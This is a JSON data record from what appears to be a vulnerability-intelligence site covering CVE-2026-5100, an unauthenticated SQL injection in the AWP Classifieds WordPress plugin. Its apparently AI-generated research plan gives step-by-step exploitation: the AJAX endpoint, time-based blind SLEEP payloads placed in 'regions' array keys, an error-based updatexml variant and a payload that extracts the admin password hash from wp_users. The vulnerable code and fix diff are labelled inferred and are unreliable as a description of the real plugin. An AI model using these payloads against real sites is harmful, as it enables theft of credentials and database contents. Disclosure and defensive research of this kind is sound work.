[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAH5O29ot4meocLGd6t4hOD6ZjGnYP3nj_um89EdSnWE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-5100","awp-classifieds-unauthenticated-sql-injection-via-regions","AWP Classifieds \u003C= 4.4.5 - Unauthenticated SQL Injection via 'regions'","The AWP Classifieds plugin for WordPress is vulnerable to SQL Injection via the 'regions' parameter array keys in versions up to, and including, 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","another-wordpress-classifieds-plugin",null,"\u003C=4.4.5","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-04 14:11:27","2026-05-11 20:37:02",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7908d167-f831-4ed0-b754-2b390b5c3b2c?source=api-prod",[],"researched",false,3,"This research plan focuses on exploiting a SQL Injection vulnerability in AWP Classifieds (\u003C= 4.4.5) via the keys of the `regions` parameter array.\n\n### 1. Vulnerability Summary\nThe AWP Classifieds plugin fails to properly sanitize or prepare SQL queries when processing the `regions` parameter in certain AJAX actions. Specifically, the plugin iterates over the `regions` array and uses the **keys** of this array directly in a SQL statement. Since array keys in PHP are often overlooked during sanitization (which usually focuses on values), an attacker can inject malicious SQL by crafting a request with a payload as the key.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Action:** `awpcp-get-regions-options` (inferred as the primary handler for region selection).\n* **Vulnerable Parameter:** `regions` (array keys).\n* **Authentication:** Unauthenticated (`wp_ajax_nopriv_awpcp-get-regions-options`).\n* **Payload Location:** URL-encoded POST body.\n* **Preconditions:** The \"Regions\" feature must be enabled in AWP Classifieds settings, and at least one region (e.g., a country) should exist in the database to trigger the code path.\n\n### 3. Code Flow (Inferred)\n1. **Entry:** The request hits `admin-ajax.php` with `action=awpcp-get-regions-options`.\n2. **Dispatch:** WordPress executes the hook `wp_ajax_nopriv_awpcp-get-regions-options`, calling the handler (likely in `Regions_AJAX_Handler` or similar).\n3. **Input Processing:** The handler retrieves `$_POST['regions']`.\n4. **Vulnerable Sink:** The code iterates through the array:\n ```php\n foreach ( $_POST['regions'] as $region_id => $region_data ) {\n \u002F\u002F The $region_id (the key) is used in a query without $wpdb->prepare()\n $wpdb->get_results( \"SELECT ... FROM ... WHERE parent_id = $region_id\" );\n }\n ```\n5. **Execution:** The database executes the injected SQL within the `$region_id` context.\n\n### 4. Nonce Acquisition Strategy\nAWP Classifieds typically uses a nonce for its AJAX operations. If the handler enforces a nonce check via `check_ajax_referer()`, it must be extracted from the frontend.\n\n1. **Identify Page:** The region selector is usually found on the \"Browse Ads\", \"Search Ads\", or \"Place Ad\" pages.\n2. **Shortcode:** `[awpcpsearchposts]` or `[awpcp_place_ad]`.\n3. **Creation:**\n ```bash\n wp post create --post_type=page --post_title=\"Search Ads\" --post_status=publish --post_content='[awpcpsearchposts]'\n ```\n4. **Extraction:**\n - Navigate to the newly created page.\n - The plugin localizes data in a variable usually named `awpcp_ajax_data` or `awpcp_regions_data`.\n - **JavaScript to execute:** `window.awpcp_ajax_data?.nonce` or `window.awpcp_regions_data?.nonce`.\n\n### 5. Exploitation Strategy\nWe will use a time-based blind SQL injection payload because the results of the `regions` query might not be directly reflected in a way that allows easy UNION extraction.\n\n* **Payload Target:** Array key of `regions`.\n* **Payload Type:** Time-based (SLEEP).\n* **HTTP Tool:** `http_request`.\n\n**Step-by-Step:**\n\n1. **Baseline Request:**\n Send a legitimate-looking request to establish a baseline response time.\n ```json\n {\n \"action\": \"awpcp-get-regions-options\",\n \"regions[0]\": \"1\"\n }\n ```\n\n2. **Exploit Request (Sleep 5):**\n Inject the payload into the key. Note the closing bracket `]` in the parameter name to terminate the array key correctly in PHP's parser.\n ```json\n {\n \"action\": \"awpcp-get-regions-options\",\n \"regions[0 AND (SELECT 1 FROM (SELECT SLEEP(5))x)]\": \"1\"\n }\n ```\n\n3. **Data Extraction (Boolean-based or Sleep-based):**\n To extract the admin user's password hash:\n ```json\n {\n \"action\": \"awpcp-get-regions-options\",\n \"regions[0 AND (SELECT 1 FROM (SELECT SLEEP(5))x WHERE (SELECT SUBSTRING(user_pass,1,1) FROM wp_users WHERE ID=1)='$')]\": \"1\"\n }\n ```\n\n### 6. Test Data Setup\n1. **Install\u002FActivate:** Ensure AWP Classifieds is active.\n2. **Enable Regions:** \n ```bash\n wp option update awpcp-enable-regions-module 1\n ```\n3. **Add a Region:** (Crucial for ensuring the query actually executes)\n Use the plugin's admin UI or WP-CLI to ensure at least one country is defined in the `awpcp_regions` table.\n4. **Create Search Page:**\n ```bash\n wp post create --post_type=page --post_title=\"Exploit Test\" --post_status=publish --post_content='[awpcpsearchposts]'\n ```\n\n### 7. Expected Results\n* **Vulnerable Response:** The HTTP request will hang for approximately 5 seconds before returning a response (likely a JSON object with `success: true` or a `0`).\n* **Non-Vulnerable Response:** The request returns immediately with a `0` or an error message if the key is rejected.\n\n### 8. Verification Steps\nAfter the HTTP exploit, verify the database state to confirm the impact:\n1. **Check SQL execution:** If the server logs are available, check `wp-content\u002Fdebug.log` (if `SAVEQUERIES` is on).\n2. **Observe Database behavior:** Use `wp db query \"SHOW PROCESSLIST\"` immediately after sending the payload to see the sleeping process.\n3. **Confirm User Data:** If using the exploit to change data (not recommended for PoC, stick to extraction), verify with:\n ```bash\n wp user get 1 --fields=user_pass\n ```\n\n### 9. Alternative Approaches\n* **Error-Based:** If `WP_DEBUG` is enabled, try `regions[0 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)]`. AWP Classifieds occasionally outputs database errors in its AJAX responses.\n* **Different Action:** If `awpcp-get-regions-options` is patched or requires high privileges, check `awpcp-update-region-selection` or `awpcp_get_locations_options`.\n* **Key Termination:** If the simple array key payload fails, try escaping with quotes: `regions[0' AND SLEEP(5) AND '1'='1]`. However, since this is a key, WordPress's GPC (Global, Post, Cookie) magic quotes\u002Fslashes may interfere if not handled carefully. Use hex encoding for strings if quotes are escaped.","The AWP Classifieds plugin for WordPress is vulnerable to unauthenticated SQL Injection due to the improper use of array keys from the 'regions' parameter in database queries. By crafting specific keys in a POST request to the 'awpcp-get-regions-options' AJAX action, an attacker can execute arbitrary SQL commands to extract data from the database.","\u002F\u002F Inferred code from Regions AJAX Handler\nforeach ( $_POST['regions'] as $region_id => $region_data ) {\n \u002F\u002F The $region_id (the key) is used in a query without $wpdb->prepare() or proper sanitization\n $wpdb->get_results( \"SELECT * FROM {$wpdb->prefix}awpcp_regions WHERE parent_id = $region_id\" );\n}","--- a\u002Fincludes\u002Fhandlers\u002Fclass-regions-ajax-handler.php\n+++ b\u002Fincludes\u002Fhandlers\u002Fclass-regions-ajax-handler.php\n@@ -10,7 +10,7 @@\n- foreach ( $_POST['regions'] as $region_id => $region_data ) {\n- $wpdb->get_results( \"SELECT * FROM {$wpdb->prefix}awpcp_regions WHERE parent_id = $region_id\" );\n+ foreach ( $_POST['regions'] as $region_id => $region_data ) {\n+ $wpdb->get_results( $wpdb->prepare( \"SELECT * FROM {$wpdb->prefix}awpcp_regions WHERE parent_id = %d\", $region_id ) );\n }","To exploit this vulnerability, an attacker targets the unauthenticated AJAX endpoint 'awpcp-get-regions-options'. Because the plugin iterates through the 'regions' POST parameter and treats the keys as trusted integer identifiers, a payload can be injected into the key itself. An attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with action=awpcp-get-regions-options and a payload like regions[0 AND (SELECT 1 FROM (SELECT SLEEP(5))x)]=1. If the server response is delayed by 5 seconds, the SQL injection is confirmed. This can be used for time-based blind data extraction of user credentials and other sensitive database contents.","gemini-3-flash-preview","2026-05-04 16:49:21","2026-05-04 16:49:41",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanother-wordpress-classifieds-plugin\u002Ftags"]